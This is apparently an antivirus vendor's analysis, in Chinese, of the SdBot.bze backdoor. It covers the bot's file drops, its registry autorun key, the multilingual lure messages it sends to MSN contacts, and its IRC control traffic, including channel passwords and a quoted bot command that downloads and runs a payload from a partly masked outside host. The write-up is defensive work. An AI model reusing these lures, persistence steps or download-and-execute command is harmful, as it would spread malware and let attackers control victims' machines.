病毒标签: | |
病毒名称: Backdoor.Win32.SdBot.bze
中文名称: MSN机器人 病毒类型: 后门类 文件 MD5: 13ABEB03D68EB64B08BA91E8181F9CC0 公开范围: 完全公开 危害等级: 5 文件长度: 脱壳前25,600 字节,脱壳后421,888 字节 感染系统: Win98以上版本 开发工具: Microsoft Visual C++ 6.0 加壳类型: UPX变形壳 |
|
病毒描述: | |
该病毒运行后,衍生病毒副本到系统目录下,添加注册表自动运行项以跟随系统引导病
毒体。病毒体判断本地是否有MSN 窗体存在,如无则连接IRC服务器,接收指令下载病毒体到 本机运行,如有则向所有联系人发送病毒副本imag091307.zip。由于病毒体具有执行IRC指令 的功能,受感染用户可被控制下载任意程序到本机执行,极具危害性与传播性。 |
行为分析: | |
本地行为:
1、文件运行后会衍生副本:
%HomeDriver%\iadfd.exe
%WinDri%\imag091307.zip %System32%\dllcache\winlogon.exe %Documents and Settings%\当前用户名\Local Settings\Temporary Internet Files\Content.IE5\SP6V4TI3\skp[1].jpg 2、新增注册表: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run " 键值:winlogon 字符串: " C:\WINDOWS\system32\dllcache\winlogon.exe " 3、如有MSN程序存在,则向联系人发送病毒副本imag091307.zip,此病毒测试用的MSN版本为 最新的8.1(Build 8.1 0178.00)。 4、随机选取文本信息以诱使联系人接收病毒体,病毒体内的字符序列如下: ZHE SHI WO DE LUOZHAO :o QING BU YAO FA GEI BIEREN !!. YI ZHANG WO GEN WO PENGYOU ZUI HAO DE ZHAOPIAN :s !!. JIESHOU WO DE ZHAO PIAN :> !!. KAN WO DE ZHAOPIAN :D. NI HE WO !!! .... QING KAN :D. kAN BA LI XI ER DUN JIN JIANYU HOU SHI DUO ME QIAOCUI :<. ay no ese pelo fue lo mas chistoso...q estabas pensando. jajaja yo me recuerdo cuando tuvistes el pelo asi. oye ponga esa foto en tu myspace como la foto principal. voy a poner esa foto de nosotros en mi blog ya. esa foto de tu y yo la voy a poner en myspace. hola esas son las fotos jaja debes poner esa foto como foto principal en tu myspace o algo :D oye voy a agregar esa foto a mi blog ya. jaja recuerda cuando tuviste el pelo asi. oye voy a poner esa foto de nosotros en mi myspace :> Per favore nessuno lasciare vede le nostre foto. Io ricordo quando abbiamo portato questa foto. Caricher questa foto al mio myspace adesso. Qui sono il fotos di ci. jaja lei dovrebbe fare quest'il suo pic predefinito sul myspace o qualcosa :Dmetta questi fotos in suo pagina myspace. ehi aggiunger quest'immagine di noi al mio weblog. jaja ricordo quando lei aveva i suoi capelli come questo. ehi metter quest'immagine di noi sul mio myspace :> chten den pics von meinen Ferien sehen?!? Wimmern! Blick auf diese alte Abbildung, die ich: fand! he ich zeige Ihnen diese Abbildung von mir berhaupt? Haha sollten Sie dieses Ihre R ckstellung auf myspace oder etwas pic bilden:D he werde ich diese Abbildung von uns meinem weblog hinzuf lol erinnern sich, an als Sie pflegten, Ihr Haar so zu haben! he werde ich diese Abbildung von uns auf mein myspace setzen! wil je fotos zien van mijn vakantie! wow! moet je eens kijken welke foto ik nu gevonden heb! he heb je ooit deze foto laten zien ? haha you moet die je standaard foto maken op hyves of myspace! hey ik voeg deze foto van ons ff toe op mijn weblog! lol ik kan me nog herrinneren toen je haar zoals dit had! Hey i zet deze foto van ons even op mijn myspace! faut de la reproduction sonore ! regard cette vieille image que j'ai trouve : | mes photos chaudes :D haha vous devriez rendre ceci votre d faut pic sur le myspace ou quelque chose :D j'ai fais pour toi ce photo album tu dois le voire :p veux tu voir mes image de vacance?? le lol se rappellent quand vous aviez l'habitude d'avoir vos cheveux comme ceci je vais mettre cette image de nous sur mon myspace :> Check out my nice photo album. :D wanna see the pics from my vacation? :> Nice new photos of me and my friends and stuff and when i was young lol... lol remember when you used to have your hair like this My friend took nice photos of me.you Should see em loL! hey i'm going to add this picture of us to my weblog Here are my private pictures for you 网络行为: (1)协议:IRC 目的端口:21888 域名或IP地址:(62.5.144.*** (俄罗斯))
(2)协议:IRC
目的端口:21888 域名或IP地址:(64.136.64.*** (美国))
Bot启动后与服务器的交互信息:
PASS SireEnX /*加入密码*/ NICK [00|CHN|XP|144635] /*昵称名由一组病毒获取的本机信息字符序列组成*/ USER XP-3039 * 0 :当前主机名 :aaa.19594.com 001 [00|CHN|XP|144635] :lowkey, [00|CHN|XP|144635]!XP- [email protected].*** :aaa.19594.com 005 [00|CHN|XP|144635] MAP KNOCK SAFELIST HCN MAXCHANNELS=500 MAXBANS=60 NICKLEN=30 TOPICLEN=307 KICKLEN=307 MAXTARGETS=15 AWAYLEN=307 :are supported by this server :aaa.19594.com 005 [00|CHN|XP|144635] WALLCHOPS WATCH=128 SILENCE=15 MODES=12 CHANTYPES=# PREFIX=(qaohv)~&@%+ CHANMODES=be, kfL,l,psmntirRcOAQKVGCuzNSMT NETWORK=lowkey CASEMAPPING=ascii EXTBAN=~,cqr :are supported by this server :aaa.19594.com 422 [00|CHN|XP|144635] :MOTD File is missing :[00|CHN|XP|144635] MODE [00|CHN|XP|144635] :+i 连接的IRC服务器列表: leaf.63***.com 221 aaa.195**.com 加入频道:#game #msn# 频道密码:biGBlackCock 加入频道后接收指令下载病毒体: :aaa.195**.com 332 [00|CHN|XP|144635] #game :!ix.wget -S -s|!ix.wget [url]http://www.autohou[/url]**india**.com/picts/picto.jpg c:\iadfd.exe r �Cs /*从指定地地址下载病毒体,衍生到c:\根目录下, 并重命名为iadfd.exe ,立刻执行*/ 本Bot支持下列标准IRC指令: UESE NICk PASS QUIT PING PONG PRIVMSG NOTICE PART JOIN MODE KICK TOPIC …… 从下列地址下载病毒体: [url]www.autohou[/url]**india**.com(216.86.146.**) /picts/picto.jpg [url]www.guilt[/url]****.com(72.52.71.***) /s3.0.exe 注: %System32% 是一个可变路径。病毒通过查询操作系统来决定当前 System文件夹的 位置。 %Windir% WINDODWS所在目录 %DriveLetter% 逻辑驱动器根目录 %ProgramFiles% 系统程序默认安装目录 %HomeDrive% 当前启动的系统的所在分区 %Documents and Settings% 当前用户文档根目录 %Temp% \Documents and Settings \当前用户\Local Settings\Temp %System32% 系统的 System32文件夹 Windows2000/NT中默认的安装路径是C:\Winnt\System32 windows95/98/me中默认的安装路径是C:\Windows\System windowsXP中默认的安装路径是C:\Windows\System32 |
|
清除方案: | |
|